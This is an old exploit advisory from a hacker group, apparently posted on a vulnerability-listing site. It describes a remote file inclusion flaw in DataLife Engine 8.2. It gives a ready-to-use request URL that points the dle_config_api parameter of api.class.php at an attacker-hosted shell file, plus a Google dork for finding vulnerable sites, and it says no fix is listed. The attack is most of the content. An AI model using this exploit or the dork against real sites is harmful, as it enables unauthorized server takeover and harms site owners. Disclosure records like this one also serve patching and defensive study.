DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability

2009-09-01 00:04:54

======================================================
DatalifeEngine 8.2 Remote File Inclusion Vulnerability

<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com

<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: DatalifeEngine8.2
<<->> home script :: http://dlecms.com/download/DatalifeEngine8.2.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered By DataLife Engine
<<->> Exploit ::

>>> www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]


=======================================================

=======================================================
<<->> All freinds , Zryan_kurd , RootSyS all member kurdish hackers team

#

Fixes

No fixes

In order to submit a new fix you need to be registered.